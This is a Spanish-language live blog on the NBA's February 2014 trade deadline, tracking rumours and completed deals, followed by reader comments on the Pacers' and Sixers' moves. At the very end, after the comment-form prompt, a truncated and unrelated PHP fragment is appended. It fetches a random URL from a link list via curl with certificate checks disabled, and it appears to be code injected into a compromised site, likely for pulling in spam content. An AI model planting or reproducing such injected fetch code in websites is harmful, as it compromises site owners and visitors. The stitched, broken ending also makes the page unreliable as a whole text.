Camino del trade deadline: Rumores y noticias

20 de February de 2014 por TheDeerHunter

Nos acercamos a la fecha límite de traspasos y todo está excesivamente parado. Por suerte, el notición que nos adelantaba ayer el compañero Ruxixon acerca del fichaje de Lamar Odom por el Caja Laboral Vitoria nos saca del letargo. Abrimos post que iremos actualizando lo más rabiosamente posible. Como siempre nos podéis echar un cable en los comentarios.

20 de Febrero de 2014. 21h10

Pasada la hora se ha anunciado que Nando De Colo se marcha a Toronto. Los Raptors envían a Austin Daye a San Antonio.

20 de Febrero de 2014. 21h00

Llega la hora límite para el cierre de traspasos con el anuncio de la marcha de Antawn Jamison a Atlanta. Los Clippers, además, se han estado planteando hasta última hora si aceptaban la oferta de los Knicks por la cual Shumpert recalaría en L.A. a cambio de Darren Collison, pero finalmente no hubo acuerdo.

20 de Febrero de 2014. 20h00

A una hora del trade deadline, ningún rumor apunta a un movimiento verdaderamente importante. Se habla, más bien, de traspasos que no van a producirse, como el de Jordan Hill, el de Jarrett Jack o el de Iman Shumpert.

20 de Febrero de 2014. 19h45

Según informa Wojnarowski, los Nuggets han llegado a un acuerdo con los Houston Rockets para intercambiar a Justin Hamilton y a Aaron Brooks. Parecía que Hamilton iría a los Knicks por Beno Udrih, pero Morey se ha adelantado a Dolan.

20 de Febrero de 2014. 18h45

Se van cerrando acuerdos. Andre Miller se marcha a los Wizards, que a cambio mandan a Jan Vesely a Denver y a Eric Maynor junto a dos segundas rondas a los Sixers. También hay acuerdo entre Bucks y Bobcats por el cual Ramon Sessions y Jeff Adrien jugarán en Milwaukee, mientras que Gary Neal y Luke Ridnour lo harán en Charlotte.

20 de Febrero de 2014. 18h30

andre millerA falta de 150 minutos para el cierre del periodo de traspasos, los últimos rumores apuntan a Washington como destino de Andre Miller. El base de los Nuggets iría a la capital a cambio de Jan Vesely y Eric Maynor, aunque este último acabaría en un tercer equipo. Los Wizards andan activos y siguen tras Deng, con Trevor Ariza como posible cebo.

Jordan Hill sigue siendo jugador de los Lakers, que esperan recibir algo más que espacio salarial en el traspaso del pívot. Los Nets, en cambio, piden al equipo angelino una 2ª ronda además del jugador.

20 de Febrero de 2014. 17h45

Ya se conocen todos los detalles del traspaso entre Sixers y Cavs: Hawes a cambio de Clark, Henry Sims y dos segundas rondas. No será el último movimiento ni de unos ni de otros.

También se acaba de anunciar el traspaso de Roger Mason Jr. de Miami a Sacramento. Los campeones hacen hueco en la plantilla, un espacio que seguramente utilizarán para reforzar su juego interior con un FA. Los Kings, por su parte, cortarán a Mason, por el que reciben algo de ‘cash’ y no darán más que una 2ª ronda tan protegida que probablemente nunca acabe en manos de los Heat.

Uno de los nombres que más ha sonado en estas horas pre-deadline es el de Gary Neal. El escolta de los Cavs podría acabar en los Bobcats a cambio de Ramon Sessions, según apuntan los últimos rumores. Por su parte, Cleveland está en negociaciones con los Clippers con un posible Tyler Zeller por Reggie Bullock sobre la mesa.

20 de Febrero de 2014. 16h45

Esto empieza a moverse algo más. Se canta el traspaso de Spencer Hawes a Cleveland a cambio de Earl Clark y un par de rondas reguleras. Todo el mundo sabía que Hawes sería traspasado y sólo faltaba conocer destino. No será el último movimiento de los Sixers que están largando gente como si no hubiera un mañana cuando en realidad ahora mismo necesitan casi 9 kilos en salarios para llegar al mínimo. Algo preparan. Por los Cavs, el trade se añade a la lista de movimientos al tún-tún. Menudo cuerpo se le habrá quedado a Tyle Zeller con la noticia. Como decíamos hace unas horas, probablemente tampoco será la última noticia que tengamos de ellos y es que Jarrett Jack lleva días en el escaparate. Se habla de los Kings con Jason Thompson como moneda de cambio. Sería un movimiento ideal pocas horas después del fichaje de otro pívot más.

Los Bobcats salen en todas las conversaciones por un escolta. Ahora suena Anthony Morrow y, también Gary Neal, como antes sonaba Afflalo o ayer Evan Turner.

Malas noticias en Denver. Parece ser que no encuentran comprador claro para Andre Miller y se plantean seriamente el buyout. Sería un final trágico para alguien que se forjó un gran nombre en esta franquicia.

Kyle Lowry, objetivo prioritario de los Knicks, parece que es más probable que renueve por los Raptors que se mude a la Gran Manzana.

20 de Febrero de 2014. 09h30

Todos los focos de Los Angeles estaban situados sobre Jordan Hill, Chris Kaman y Pau Gasol pero finalmente ha sido Steve Blake el que ha salido de la franquicia angelina rumbo a la bahía de San Francisco. El base de los Lakers llega a los Warriors a cambio de Kent Bazemore y Marshon Brooks. Golden State busca a un ‘Jarrett Jack’ que eche una mano a Stephen Curry y Blake podría adaptarse muy bien a ese rol. Los amarillos se ahoran unos 4 millones de dólares más impuestos.

Los Charlotte Bobcats buscan reforzarse al ver que tiene muchas posibilidades de clasificarse para los Playoffs. Buscan un escolta y Arron Afflalo es el que más les gusta. La 1ª ronda que tienen de los Blazers sería el eje central de la negociación con los Magic.

20 de Febrero 2014. 01h30

jhillSin más trades que el de Terry & Evans por Thornton, nos tenemos que conformar por ahora con los rumores, y tampoco está la cosa para tirar cohetes en ese departamento. Todo apunta a que Jordan Hill saldrá de los Lakers, y Nets, Cavs, Suns, Hawks y Mavs se presentan como posibles destinos. Chris Kaman también ha sido mencionado en las negociaciones. El nombre de Pau Gasol parece haber quedado en segundo plano pero haríamos mal en descartar un traspaso del pívot catalán. Raro sería que los Lakers no cerrasen un par de acuerdos en las próximas horas.

Los Knicks también tienen varios frentes abiertos. Además de un posible intercambio de Udrih por Justin Hamilton, quieren colocar a Felton junto a Shumpert, pero no encuentran ‘comprador’. Los Clippers, entre otros, se niegan a asumir el contrato del base de NYK, aunque la entrada de Matt Barnes en lugar de Reggie Bullock puede ayudar a materializar el traspaso. También están fracasando los Cavs en su intento de traspasar a Luol Deng, dado que el alero ha declarado que quiere ser FA este verano y no extenderá contrato. Cleveland está negociando con los Warriors por Harrison Barnes, aunque se desconocen los detalles.

Tal vez el mayor nombre en todo este mercadeo sea el de Rajon Rondo, al que ahora se sitúa como centro de la diana de los Rockets. Según varios medios, Ainge exige que entre Chandler Parsons en el posible traspaso, algo a lo que Morey se niega rotundamente.

19 de Febrero 2014. 20h30

Jason Terry y Reggie Evans a cambio de Marcus Thornton. Lo adelantábamos en la anterior actualización y ya tenemos la primera negociación cerrada, con Brooklyn Nets y Sacramento Kings como artífices. Mikhail Prokhorov sigue mostrándose dispuesto a tirar de VISA con tal de reforzar a los Nets, y el próximo objetivo parece ser Jordan Hill, que como decíamos ayer, llegaría desde los Lakers a cambio de la Disabled Player Exception recibida por la lesión de Brook Lopez. En este caso, no hay nada confirmado a esta hora, aunque sí parece probable que Hill deje los Lakers antes del cierre del mercado. Suns y Mavs también se han interesado por el ala-pívot.

Otro rumor surgido en las útimas horas es el intercambio entre Knicks y Clippers, que supondría la llegada de Felton y Iman Shumpert a L.A. y la marcha de Darren Collison y Bullock camino de NY.

19 de Febrero 2014. 15h00

Escasas novedades que ofrecer en un mercado muy parado hasta el momento. Los grandes nombres que se han barajado no tienen fácil salida por las exigencias de sus clubes y la incertidumbre de sus renovaciones.

Suena con fuerza Evan Turner a los Charlotte Bobcats. Éstos ofrecerían una primera ronda a cambio. Ellos también son uno de los que más interés ha mostrado en Pau Gasol, con lo que podrían llegar a formar un hueso duro en su conferencia.

Si ayer comentábamos lo de Chase Budinger a Memphis hoy completamos la información con el pack quep odría formar junto a J.J. Barea a cambio de Tayshaun Prince y de Tony Allen.

También mencionábamos a Jason Terry.  Los Kings han entrado en la puja y parece que han ofrecido a Marcus Thornton a cambio del propio Terry y Reggie Evans.

18 de Febrero 2014. 17h00

Uno de los focos de mayor atención es el posible traspaso de Rajon Rondo. Una de las ofertas que más fuerte ha sonado es la de los Kings que podrían haber a Isaiah Thomas, Ben McLemore y dos rondas por él. El supuesto escaso interés del aún base de los Celtics por renovar con los Kings complica la operación.

Los Wolves han mostrado interés en adquirir al díscolo Andre Miller y parece que a cambio estarían dispuestos a poner a JJ Barea sobre la mesa. Se comenta que Chase Budinger también puede salir con Memphis como posible destino.

Es altamente dudoso que Jordan Hill renueve con los Lakers si D’Antoni sigue en el cargo. De momento parece que los Lakers han optado por ponerle en el mercado y hay una negociación abierta con los Nets, que vendrían a ofrecer la Disabled Player Exception de Brook Lopez. O sea, Jordan Hill a cambio de hueco salarial. Difícil que Mikhail Prokhorov ponga aún más dinero encima de la mesa.

Los Knicks ponen su punto de mira en todo base viviente. Además de Rondo y Kyle Lowry ahora han mostrado fuerte interés en Jeff Teague. Se comenta que por Lowry habían llegado a ofrecer a Raymond Felton, Iman Shumpert y Beno Udrih. Los Raptors, además, exigían a Tim Hardaway Jr. o una primera ronda.

Por su parte, los Cavs quieren traspasar a Jarrett Jack. Jason Terry suena como mondea de cambio.

Comenta

70 comentarios a esta entrada

  1. Denise dice:
    #1

    Para mí los único beneficiados del Deadline son Washington, Philadelphia y Lakers. Para los demás, creo que no cambia mucho la cosa.

      Citar

  2. Esteban dice:
    #2

    no es por recordar mi analisis de los clippers, pero si repasamos los grandes fichajes de los clippers este año:
    Jamison ya se fue casi sin jugar
    Mullens, esta vivo? o en la liga de desarrollo?
    Redick a jugado un cuarto de liga
    Dudley es suplente de Barnes

    solo collison ha jugado por sobre las expectativas

      Citar

  3. Denise dice:
    #3

    Esteban:
    no es por recordar mi analisis de los clippers, pero si repasamos los grandes fichajes de los clippers este año:
    Jamison ya se fue casi sin jugar
    Mullens, esta vivo? o en la liga de desarrollo?
    Redick a jugado un cuarto de liga
    Dudley es suplente de Barnes

    solo collison ha jugado por sobre las expectativas

    jaja, tio, Mullens y Jamison si han sido 2 fracasos, pero Redick está haciendo un temporadón, qué se haya lesionado es mala suerte, es algo imponderable al hacer el trade. A Dudley es que le han sobrestimado y le han colocado un rol que no le pertenece, de todas formas me parece un jugador útil y aprovechable.
    En la pintura deberían haberse reforzado, creo que una lesión de Deandre Jordan les dejaría con menos opciones de títulos que si el lesionado es Chris Paul..

      Citar

  4. rumbero dice:
    #4

    Ojo que puede Bird se puede haber marcado un clutch cuando ya se acababa el tema. Granger a Philly y Turner a Indiana.

      Citar

  5. Denise dice:
    #5

    rumbero:
    Ojo que puede Bird se puede haber marcado un clutch cuando ya se acababa el tema. Granger a Philly y Turner a Indiana.

    Hijos de p…los 76ers, pedazo de tanking. ¿cuantos partidos mas van a ganar? Cero.
    De verdad, me parece cojonuda su reocnstrucción, pero no a este precio, la NBA debería tomar medidas con esto del Tanking, y los de Indiana aprovechandose de esto, indiscutibles candidatos nº1 al anillo.. Que manía le estoy cogiendo a los Pacers, por dios Lebron, destrózalos en la Final del Este,

      Citar

  6. MagicJohnson32 dice:
    #6

    Larry Bird me acaba de desmontar todo el texto que tenía sobre el resumen del trade deadline xDDD

      Citar

  7. Denise dice:
    #7

    Pero es que Lavoy Allen también va para Indiana. Cabrones!! La plantilla de los 76ers es ridicula, encima tendrán un pick top 5, otro pick top 10 (de los Pelicans) y cómo 30 kilos para fichar agentes libres.

      Citar

  8. Ruxixon dice:
    #8

    WOW…cómo interpretamos este movimiento.A Granger no lo iban a renovar,pero ahora tienes a Stephenson y Turner para renovar¿Apretarán a Stephenson con que si no renueva a un precio ajustado lo harán con Turner?¿Van a tirar la casa por la ventana?

      Citar

  9. Chipi dice:
    #9

    Yo cada día quiero a más al viejo Larry xDD

      Citar

  10. Ruxixon dice:
    #10

    Por cierto al parecer Mullens a los 76ers a cambio de una segunda ronda

      Citar

  11. Denise dice:
    #11

    Ruxixon:
    WOW…cómo interpretamos este movimiento.A Granger no lo iban a renovar,pero ahora tienes a Stephenson y Turner para renovar¿Apretarán a Stephenson con que si no renueva a un precio ajustado lo harán con Turner?¿Van a tirar la casa por la ventana?

    Carpe Diem Ruxxion, a saco para ganar al anillo este año, y en verano ya habrá tiempo para tomar decisiones.

      Citar

  12. Vader dice:
    #12

    Tremendo Bird, que bueno es el cabroncete…

      Citar

  13. Ruxixon dice:
    #13

    Denise: Carpe Diem Ruxxion, a saco para ganar al anillo este año, y en verano ya habrá tiempo para tomar decisiones.

    Está claro.Madre mía como se pone la cosa para que LeBron consiga el tercer anillo…

      Citar

  14. steban83 dice:
    #14

    Ya solo falta que Bynum se ponga las pilas y deje los bolos y el flamenco por 6 meses, vaya equipado que se han montado

      Citar

  15. MagicJohnson32 dice:
    #15

      Citar

  16. Sancho88 dice:
    #16

    Larry Bird es dios, simplemente es dios. Que hijo de puta. Vaya equipazo los Pacers. Increíble… Eso sí, a ver cómo van a rotar ahora, es que perfectamente la segunda unidad podría ser aspirante a Playoffs. Watson-Turner-Allen-Scola-Bynum más Copeland, más Mahinmi…joder, qué lujazo macho… qué puto equipazo se ha armado ese señor. Mis respetos. Aunque teóricamente el quinteto sería Hill-Turner-George-West-Hibber. Supongo que Stephenson será el líder de la segunda unidad, aunque me parece un error pues es uno de los mejores escoltas titulares de la liga

    Sixers? No coment. Ojalá tengan una mala suerte del copón en el draft y no les llegue ni Parker, ni Embiid ni Wiggins. Ahí sí que nos vamos a reir pero bien. Como decís, lo que están haciendo debería estar prohibido. No obstante, solamente han hecho lo que tenían que hacer. Asumir un contrato gordo para llegar al mínimo y seguir tanqueando. Pero es ridículo el Sam Hinkie este de las pelotas. Ha creado un engendro de equipo que encima seguro que tiene suerte y le queda bien el año que viene. Pero soltar a Turner y Hawes el mismo día… ha sido descarado. Aún así, pues mira, el año que viene van a tener a MCW-Wroten-Hollis Thompson-Young-Moultrie-Noel + 2 Top 10 del draft más 30-40 millones en salarios para FA’s… son 8 tíos jóvenes y con muchísima proyección más los Fa’s… en fin, un equipo de Playoffs a medio plazo que si les caen dos cracks en el draft les puede hacer contenders. Pero bueno, sigue siendo una jodida vergüenza lo que han hecho. Lamentable

      Citar

  17. Esteban dice:
    #17

    Simon:
    Totalmente de acuerdo. Siempre me ha llamado la atención Bazemore, me parece un jugador super aprovechable.

    shapo para simon, si le q le has pegado con Bazemore, un tio al que particularmente no he visto jugar y que venia calentando banquillo a mas no poder en los warriors y en 3 juegos con los Lakers se ha desatado y esta promediando 18 puntos
    estas para el moneyball jajjaa

      Citar

  18. Esteban dice:
    #18

    por otra parte, es cierto que los esquemas de D´antoni inflan las estadisticas de todos los jugadores, pero este alos lakers han recuperado jugadores que parecian definitivamente perdidos para la NBA

    Havier Henry 10 ppp
    Wes Johnson 9 ppp
    Kendall Marshal 9 asistencias
    y los recien llegados:
    Bazemore 18 puntos y Brooks 10

    ademas de los ignotos Ryan Kelly y sus 7 ppp y Many Harris 8.1 ppp

    asi que jugadores mediocres y saben, si quieren ganarse un contratito juegen para los equipos de mike

      Citar

  19. Simon dice:
    #19

    Esteban: shapo para simon, si le q le has pegado con Bazemore, un tio al que particularmente no he visto jugar y que venia calentando banquillo a mas no poder en los warriors y en 3 juegos con los Lakers se ha desatado y esta promediando 18 puntos
    estas para el moneyball jajjaa

    El caso es que si Bazemore me llamaba la atención es porque es un extraordinario defensor, al menos así era en la Universidad por que en la NBA aún no ha podido demostrar nada de eso. De hecho cuando llegó a Warriors me gustó mucho porque pensaba que iba a tener un hueco como especialista defensivo en la Bahía pero no le han dado bola. En ataque lo poco que le he visto es un cabeza loca. A mi por caracteristicas me recuerda mucho a Lance Stephenson. Menos fuerte pero más explosivo y rápido. Y más limitado en ataque.

      Citar

  20. rumbero dice:
    #20

    Simon:
    A mi por caracteristicas me recuerda mucho a Lance Stephenson. Menos fuerte pero más explosivo y rápido. Y más limitado en ataque.

    Y con más talento para agitar toallas. Me gusta la comparación.
    Yo lo vi en la potente Summer League de las Vegas y fue de largo el mejor jugador del torneo. Pensaba como tú que le darían algunos minutos para defender un rato al PG estrella rival pero ni eso. Buen sitio los Lakers para empezar a sacar la cabeza

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>